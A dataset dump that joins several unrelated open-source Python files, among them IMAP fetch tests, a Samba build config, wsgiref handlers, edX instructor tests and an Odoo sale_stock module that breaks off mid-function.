self.uid = uid
self._fetchWork(fetch)
def testFetchHeadersUID(self):
self.testFetchHeaders(1)
def testFetchBody(self, uid=0):
def fetch():
return self.client.fetchBody(self.messages, uid=uid)
self.expected = {
1: {'RFC822TEXT': 'XXX put some body here'},
}
self.messages = '1,2,3,4,5,6,7'
self.parts = ['RFC822TEXT']
self.uid = uid
self._fetchWork(fetch)
def testFetchBodyUID(self):
self.testFetchBody(1)
def testFetchSize(self, uid=0):
def fetch():
return self.client.fetchSize(self.messages, uid=uid)
self.expected = {
1: {'SIZE': '12345'},
}
self.parts = ['RFC822SIZE']
self.uid = uid
self._fetchWork(fetch)
def testFetchSizeUID(self):
self.testFetchSize(1)
def testFetchFull(self, uid=0):
def fetch():
return self.client.fetchFull(self.messages, uid=uid)
self.expected = {
1: {
'FLAGS': 'XXX put some flags here',
'INTERNALDATE': 'Sun, 25 Jul 2010 06:20:30 -0400 (EDT)',
'RFC822SIZE': '12345',
'ENVELOPE': 'XXX envelope',
'BODY': 'XXX body',
},
3: {
'FLAGS': 'XXX put some flags here',
'INTERNALDATE': 'Mon, 14 Apr 2003 19:43:44 -0400',
'RFC822SIZE': '12345',
'ENVELOPE': 'XXX envelope',
'BODY': 'XXX body',
}
}
self.messages = '1,3'
self.parts = ['FLAGS', 'INTERNALDATE', 'RFC822SIZE', 'ENVELOPE', 'BODY']
self.uid = uid
self._fetchWork(fetch)
def testFetchFullUID(self):
self.testFetchFull(1)
def testFetchAll(self, uid=0):
def fetch():
return self.client.fetchAll(self.messages, uid=uid)
self.expected = {
1: {
'ENVELOPE': 'the envelope looks like this',
'RFC822SIZE': '1023',
'INTERNALDATE': 'Tuesday',
'FLAGS': [],
}, 2: {
'ENVELOPE': 'another envelope',
'RFC822SIZE': '3201',
'INTERNALDATE': 'Friday',
'FLAGS': ['\\SEEN', '\\DELETED'],
}
}
self.messages = '1,2:3'
self.parts = ['ENVELOPE', 'RFC822SIZE', 'INTERNALDATE', 'FLAGS']
self.uid = uid
self._fetchWork(fetch)
def testFetchAllUID(self):
self.testFetchFull(1)
def testFetchFast(self, uid=0):
def fetch():
return self.client.fetchFast(self.messages, uid=uid)
self.expected = {
1: {
'FLAGS': [],
'INTERNALDATE': '19 Mar 2003 19:22:21 -0500',
'RFC822SIZE': '12345',
},
}
self.messages = '1'
self.parts = ['FLAGS', 'INTERNALDATE', 'RFC822SIZE']
self.uid = uid
self._fetchWork(fetch)
def testFetchFastUID(self):
self.testFetchFast(1)
| gpl-2.0 | 2,379,290,569,724,047,000 | 33.020774 | 115 | 0.554999 | false |
artemh/asuswrt-merlin | release/src/router/samba36/source3/build/dynconfig.py | 19 | 4157 | import string, Utils
# list of directory options to offer in configure
dir_options = {
'with-cachedir' : [ '${PREFIX}/var/locks', 'where to put temporary cache files' ],
'with-codepagedir' : [ '${PREFIX}/lib/samba', 'where to put codepages' ],
'with-configdir' : [ '${PREFIX}/etc/samba', 'Where to put configuration files' ],
'with-lockdir' : [ '${PREFIX}/var/locks', 'where to put lock files' ],
'with-logfilebase' : [ '${PREFIX}/var/log/samba', 'Where to put log files' ],
'with-ncalrpcdir' : [ '${PREFIX}/var/ncalrpc', 'where to put ncalrpc sockets' ],
'with-nmbdsocketdir' : [ '${PREFIX}/var/locks/.nmbd', 'Where to put the nmbd socket directory' ],
'with-ntp-signd-socket-dir' : [ '${PREFIX}/var/run/ntp_signd', 'NTP signed directory'],
'with-pammodulesdir' : [ '', 'Which directory to use for PAM modules' ],
'with-piddir' : [ '${PREFIX}/var/locks', 'where to put pid files' ],
'with-privatedir' : [ '${PREFIX}/private', 'where to put smbpasswd' ],
'with-selftest-prefix' : [ '', 'The prefix where make test will be run' ],
'with-selftest-shrdir' : [ '', 'The share directory that make test will be run against' ],
'with-statedir' : [ '${PREFIX}/var/locks', 'where to put persistent state files' ],
'with-swatdir' : [ '${PREFIX}/swat', 'Where to put SWAT files' ],
'with-winbindd-privileged-socket-dir' : [ '${PREFIX}/var/lib/winbindd_privileged', 'winbind privileged socket directory'],
'with-winbindd-socket-dir' : [ '${PREFIX}/var/lib/winbindd', 'winbind socket directory' ],
}
# list of cflags to use for dynconfig.c
dyn_cflags = {
'BINDIR' : '${BINDIR}',
'CACHEDIR' : '${CACHEDIR}',
'CODEPAGEDIR' : '${CODEPAGEDIR}',
'CONFIGDIR' : '${SYSCONFDIR}',
'CONFIGFILE' : '${SYSCONFDIR}/smb.conf',
'DATADIR' : '${DATADIR}',
'LIBDIR' : '${LIBDIR}',
'LOCALEDIR' : '${LOCALEDIR}',
'LMHOSTSFILE' : '${SYSCONFDIR}/lmhosts',
'LOCKDIR' : '${LOCALSTATEDIR}/locks',
'LOGFILEBASE' : '${LOCALSTATEDIR}',
'MODULESDIR' : '${PREFIX}/modules',
'NCALRPCDIR' : '${LOCALSTATEDIR}/ncalrpc',
'NMBDSOCKETDIR' : '${LOCKDIR}/.nmbd',
'NTP_SIGND_SOCKET_DIR' : '${NTP_SIGND_SOCKET_DIR}',
'PIDDIR' : '${LOCALSTATEDIR}/run',
'PKGCONFIGDIR' : '${LIBDIR}/pkgconfigdir',
'PRIVATE_DIR' : '${PRIVATEDIR}',
'SBINDIR' : '${SBINDIR}',
'SETUPDIR' : '${DATADIR}/setup',
'SMB_PASSWD_FILE' : '${PRIVATEDIR}/smbpasswd',
'STATEDIR' : '${LOCALSTATEDIR}',
'SWATDIR' : '${PREFIX}/swat',
'WINBINDD_PRIVILEGED_SOCKET_DIR' : '${WINBINDD_PRIVILEGED_SOCKET_DIR}',
'WINBINDD_SOCKET_DIR' : '${WINBINDD_SOCKET_DIR}',
}
def get_varname(v):
'''work out a variable name from a configure option name'''
if v.startswith('with-'):
v = v[5:]
v = v.upper()
v = string.replace(v, '-', '_')
return v
def dynconfig_cflags(bld):
'''work out the extra CFLAGS for dynconfig.c'''
cflags = []
for f in dyn_cflags.keys():
# substitute twice, as we could have substitutions containing variables
v = Utils.subst_vars(dyn_cflags[f], bld.env)
v = Utils.subst_vars(v, bld.env)
bld.ASSERT(v != '', "Empty dynconfig value for %s" % f)
bld.ASSERT(v.find('${') == -1, "Unsubstituted variable in %s : %s : %s" % (f, dyn_cflags[f], v))
cflags.append('-D%s="%s"' % (f, v))
return cflags
| gpl-2.0 | 9,128,600,073,514,185,000 | 56.736111 | 126 | 0.492422 | false |
sillydan1/WhatEverEngine | packages/IronPython.StdLib.2.7.5/content/Lib/wsgiref/handlers.py | 109 | 15932 | """Base classes for server/gateway implementations"""
from types import StringType
from util import FileWrapper, guess_scheme, is_hop_by_hop
from headers import Headers
import sys, os, time
__all__ = ['BaseHandler', 'SimpleHandler', 'BaseCGIHandler', 'CGIHandler']
try:
dict
except NameError:
def dict(items):
d = {}
for k,v in items:
d[k] = v
return d
# Uncomment for 2.2 compatibility.
#try:
# True
# False
#except NameError:
# True = not None
# False = not True
# Weekday and month names for HTTP date/time formatting; always English!
_weekdayname = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
_monthname = [None, # Dummy so we can use 1-based month numbers
"Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
def format_date_time(timestamp):
year, month, day, hh, mm, ss, wd, y, z = time.gmtime(timestamp)
return "%s, %02d %3s %4d %02d:%02d:%02d GMT" % (
_weekdayname[wd], day, _monthname[month], year, hh, mm, ss
)
class BaseHandler:
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = None # String name of server software, if any
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 Internal Server Error"
error_headers = [('Content-Type','text/plain')]
error_body = "A server error occurred. Please contact the administrator."
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will
want to redefine this method, such that it sets up callbacks
in the event loop to iterate over the data, and to call
'self.close()' once the response is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError,AttributeError,NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert type(status) is StringType,"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert type(name) is StringType,"Header names must be strings"
assert type(val) is StringType,"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % format_date_time(time.time())
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert type(data) is StringType,"write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
transmission of the file.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
# Only zero Content-Length if not set by the application (so
# that HEAD requests can be satisfied properly, see #3839)
self.headers.setdefault('Content-Length', "0")
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
"""Close the iterable (if needed) and reset all instance vars
Subclasses may want to also drop the client connection.
"""
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
"""WSGI mini-app to create error output
By default, this just uses the 'error_status', 'error_headers',
and 'error_body' attributes to generate an output page. It can
be overridden in a subclass to dynamically generate diagnostics,
choose an appropriate message for the user's preferred language, etc.
Note, however, that it's not recommended from a security perspective to
spit out diagnostics to any old user; ideally, you should have to do
something special to enable diagnostic output, which is why we don't
include any here!
"""
start_response(self.error_status,self.error_headers[:],sys.exc_info())
return [self.error_body]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
"""Override in subclass to buffer data for send to client
It's okay if this method actually transmits the data; BaseHandler
just separates write and flush operations for greater efficiency
when the underlying system actually has such a distinction.
"""
raise NotImplementedError
def _flush(self):
"""Override in subclass to force sending of recent '_write()' calls
It's okay if this method is a no-op (i.e., if '_write()' actually
sends the data.
"""
raise NotImplementedError
def get_stdin(self):
"""Override in subclass to return suitable 'wsgi.input'"""
raise NotImplementedError
def get_stderr(self):
"""Override in subclass to return suitable 'wsgi.errors'"""
raise NotImplementedError
def add_cgi_vars(self):
"""Override in subclass to insert CGI variables in 'self.environ'"""
raise NotImplementedError
class SimpleHandler(BaseHandler):
"""Handler that's just initialized with streams, environment, etc.
This handler subclass is intended for synchronous HTTP/1.0 origin servers,
and handles sending the entire response output, given the correct inputs.
Usage::
handler = SimpleHandler(
inp,out,err,env, multithread=False, multiprocess=True
)
handler.run(app)"""
def __init__(self,stdin,stdout,stderr,environ,
multithread=True, multiprocess=False
):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
class BaseCGIHandler(SimpleHandler):
"""CGI-like systems using input/output/error streams and environ mapping
Usage::
handler = BaseCGIHandler(inp,out,err,env)
handler.run(app)
This handler class is useful for gateway protocols like ReadyExec and
FastCGI, that have usable input/output/error streams and an environment
mapping. It's also the base class for CGIHandler, which just uses
sys.stdin, os.environ, and so on.
The constructor also takes keyword arguments 'multithread' and
'multiprocess' (defaulting to 'True' and 'False' respectively) to control
the configuration sent to the application. It sets 'origin_server' to
False (to enable CGI-like output), and assumes that 'wsgi.run_once' is
False.
"""
origin_server = False
class CGIHandler(BaseCGIHandler):
"""CGI-based invocation via sys.stdin/stdout/stderr and os.environ
Usage::
CGIHandler().run(app)
The difference between this class and BaseCGIHandler is that it always
uses 'wsgi.run_once' of 'True', 'wsgi.multithread' of 'False', and
'wsgi.multiprocess' of 'True'. It does not take any initialization
parameters, but always uses 'sys.stdin', 'os.environ', and friends.
If you need to override any of these parameters, use BaseCGIHandler
instead.
"""
wsgi_run_once = True
# Do not allow os.environ to leak between requests in Google App Engine
# and other multi-run CGI use cases. This is not easily testable.
# See http://bugs.python.org/issue7250
os_environ = {}
def __init__(self):
BaseCGIHandler.__init__(
self, sys.stdin, sys.stdout, sys.stderr, dict(os.environ.items()),
multithread=False, multiprocess=True
)
| apache-2.0 | 3,821,485,359,176,663,600 | 34.5625 | 79 | 0.62114 | false |
factorlibre/OCB | addons/note_pad/__openerp__.py | 312 | 1691 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Memos pad',
'version': '0.1',
'category': 'Tools',
'description': """
This module update memos inside OpenERP for using an external pad
=================================================================
Use for update your text memo in real time with the following user that you invite.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/notes',
'summary': 'Sticky memos, Collaborative',
'depends': [
'mail',
'pad',
'note',
],
'data': [
'note_pad_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,940,159,063,534,811,600 | 33.510204 | 83 | 0.57126 | false |
caesar2164/edx-platform | lms/djangoapps/instructor/tests/test_services.py | 10 | 5649 | """
Tests for the InstructorService
"""
import json
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.models import StudentModule
from lms.djangoapps.instructor.access import allow_access
from lms.djangoapps.instructor.services import InstructorService
from lms.djangoapps.instructor.tests.test_tools import msk_from_problem_urlname
from nose.plugins.attrib import attr
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
import mock
@attr(shard=1)
class InstructorServiceTests(SharedModuleStoreTestCase):
"""
Tests for the InstructorService
"""
@classmethod
def setUpClass(cls):
super(InstructorServiceTests, cls).setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.other_problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-other_problem-urlname'
)
cls.problem_urlname = unicode(cls.problem_location)
cls.other_problem_urlname = unicode(cls.other_problem_location)
def setUp(self):
super(InstructorServiceTests, self).setUp()
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.service = InstructorService()
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 2}),
)
@mock.patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
"""
Test delete student state.
"""
# make sure the attempt is there
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
1
)
self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.problem_urlname,
requesting_user=self.student,
)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_bad_content_id(self):
"""
Negative test of trying to reset attempts with bad content_id
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_bad_user(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
'bad_student',
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_non_existing_attempt(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.other_problem_urlname,
requesting_user=self.student,
)
self.assertIsNone(result)
def test_is_user_staff(self):
"""
Test to assert that the user is staff or not
"""
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertFalse(result)
# allow staff access to the student
allow_access(self.course, self.student, 'staff')
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertTrue(result)
def test_report_suspicious_attempt(self):
"""
Test to verify that the create_zendesk_ticket() is called
"""
requester_name = "edx-proctoring"
email = "[email protected]"
subject = "Proctored Exam Review: {review_status}".format(review_status="Suspicious")
body = "A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} was " \
"reviewed as {review_status} by the proctored exam review provider."
body = body.format(
exam_name="test_exam", course_name=self.course.display_name, student_username="test_student",
review_status="Suspicious"
)
tags = ["proctoring"]
with mock.patch("lms.djangoapps.instructor.services.create_zendesk_ticket") as mock_create_zendesk_ticket:
self.service.send_support_notification(
course_id=unicode(self.course.id),
exam_name="test_exam",
student_username="test_student",
review_status="Suspicious"
)
mock_create_zendesk_ticket.assert_called_with(requester_name, email, subject, body, tags)
| agpl-3.0 | 5,714,664,984,746,693,000 | 33.236364 | 114 | 0.614976 | false |
KousikaGanesh/purchaseandInventory | openerp/addons/sale_stock/sale_stock.py | 11 | 34326 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
from openerp import netsvc
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_shop(osv.osv):
_inherit = "sale.shop"
_columns = {
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse'),
}
sale_shop()
class sale_order(osv.osv):
_inherit = "sale.order"
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default.update({
'shipped': False,
'picking_ids': [],
})
return super(sale_order, self).copy(cr, uid, id, default, context=context)
def shipping_policy_change(self, cr, uid, ids, policy, context=None):
if not policy:
return {}
inv_qty = 'order'
if policy == 'prepaid':
inv_qty = 'order'
elif policy == 'picking':
inv_qty = 'procurement'
return {'value': {'invoice_quantity': inv_qty}}
def write(self, cr, uid, ids, vals, context=None):
if vals.get('order_policy', False):
if vals['order_policy'] == 'prepaid':
vals.update({'invoice_quantity': 'order'})
elif vals['order_policy'] == 'picking':
vals.update({'invoice_quantity': 'procurement'})
return super(sale_order, self).write(cr, uid, ids, vals, context=context)
def create(self, cr, uid, vals, context=None):
if vals.get('order_policy', False):
if vals['order_policy'] == 'prepaid':
vals.update({'invoice_quantity': 'order'})
if vals['order_policy'] == 'picking':
vals.update({'invoice_quantity': 'procurement'})
order = super(sale_order, self).create(cr, uid, vals, context=context)
return order
# This is False
def _picked_rate(self, cr, uid, ids, name, arg, context=None):
if not ids:
return {}
res = {}
tmp = {}
for id in ids:
tmp[id] = {'picked': 0.0, 'total': 0.0}
cr.execute('''SELECT
p.sale_id as sale_order_id, sum(m.product_qty) as nbr, mp.state as procurement_state, m.state as move_state, p.type as picking_type
FROM
stock_move m
LEFT JOIN
stock_picking p on (p.id=m.picking_id)
LEFT JOIN
procurement_order mp on (mp.move_id=m.id)
WHERE
p.sale_id IN %s GROUP BY m.state, mp.state, p.sale_id, p.type''', (tuple(ids),))
for item in cr.dictfetchall():
if item['move_state'] == 'cancel':
continue
if item['picking_type'] == 'in':#this is a returned picking
tmp[item['sale_order_id']]['total'] -= item['nbr'] or 0.0 # Deducting the return picking qty
if item['procurement_state'] == 'done' or item['move_state'] == 'done':
tmp[item['sale_order_id']]['picked'] -= item['nbr'] or 0.0
else:
tmp[item['sale_order_id']]['total'] += item['nbr'] or 0.0
if item['procurement_state'] == 'done' or item['move_state'] == 'done':
tmp[item['sale_order_id']]['picked'] += item['nbr'] or 0.0
for order in self.browse(cr, uid, ids, context=context):
if order.shipped:
res[order.id] = 100.0
else:
res[order.id] = tmp[order.id]['total'] and (100.0 * tmp[order.id]['picked'] / tmp[order.id]['total']) or 0.0
return res
_columns = {
'state': fields.selection([
('draft', 'Draft Quotation'),
('sent', 'Quotation Sent'),
('cancel', 'Cancelled'),
('waiting_date', 'Waiting Schedule'),
('progress', 'Sales Order'),
('manual', 'Sale to Invoice'),
('shipping_except', 'Shipping Exception'),
('invoice_except', 'Invoice Exception'),
('done', 'Done'),
], 'Status', readonly=True, track_visibility='onchange',
help="Gives the status of the quotation or sales order.\
\nThe exception status is automatically set when a cancel operation occurs \
in the invoice validation (Invoice Exception) or in the picking list process (Shipping Exception).\nThe 'Waiting Schedule' status is set when the invoice is confirmed\
but waiting for the scheduler to run on the order date.", select=True),
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'picking_ids': fields.one2many('stock.picking.out', 'sale_id', 'Related Picking', readonly=True, help="This is a list of delivery orders that has been generated for this sales order."),
'shipped': fields.boolean('Delivered', readonly=True, help="It indicates that the sales order has been delivered. This field is updated only after the scheduler(s) have been launched."),
'picked_rate': fields.function(_picked_rate, string='Picked', type='float'),
'invoice_quantity': fields.selection([('order', 'Ordered Quantities'), ('procurement', 'Shipped Quantities')], 'Invoice on',
help="The sales order will automatically create the invoice proposition (draft invoice).\
You have to choose if you want your invoice based on ordered ", required=True, readonly=True, states={'draft': [('readonly', False)]}),
}
_defaults = {
'picking_policy': 'direct',
'order_policy': 'manual',
'invoice_quantity': 'order',
}
# Form filling
def unlink(self, cr, uid, ids, context=None):
sale_orders = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in sale_orders:
if s['state'] in ['draft', 'cancel']:
unlink_ids.append(s['id'])
else:
raise osv.except_osv(_('Invalid Action!'), _('In order to delete a confirmed sales order, you must cancel it.\nTo do so, you must first cancel related picking for delivery orders.'))
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing delivery orders of given sales order ids. It can either be a in a list or in a form view, if there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',["+','.join(map(str, pick_ids))+"])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
picking_obj = self.pool.get('stock.picking')
res = super(sale_order,self).action_invoice_create( cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
picking_obj.write(cr, uid, map(lambda x: x.id, order.picking_ids), {'invoice_state': 'invoiced'})
return res
def action_cancel(self, cr, uid, ids, context=None):
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
sale_order_line_obj = self.pool.get('sale.order.line')
proc_obj = self.pool.get('procurement.order')
for sale in self.browse(cr, uid, ids, context=context):
for pick in sale.picking_ids:
if pick.state not in ('draft', 'cancel'):
raise osv.except_osv(
_('Cannot cancel sales order!'),
_('You must first cancel all delivery order(s) attached to this sales order.'))
if pick.state == 'cancel':
for mov in pick.move_lines:
proc_ids = proc_obj.search(cr, uid, [('move_id', '=', mov.id)])
if proc_ids:
for proc in proc_ids:
wf_service.trg_validate(uid, 'procurement.order', proc, 'button_check', cr)
for r in self.read(cr, uid, ids, ['picking_ids']):
for pick in r['picking_ids']:
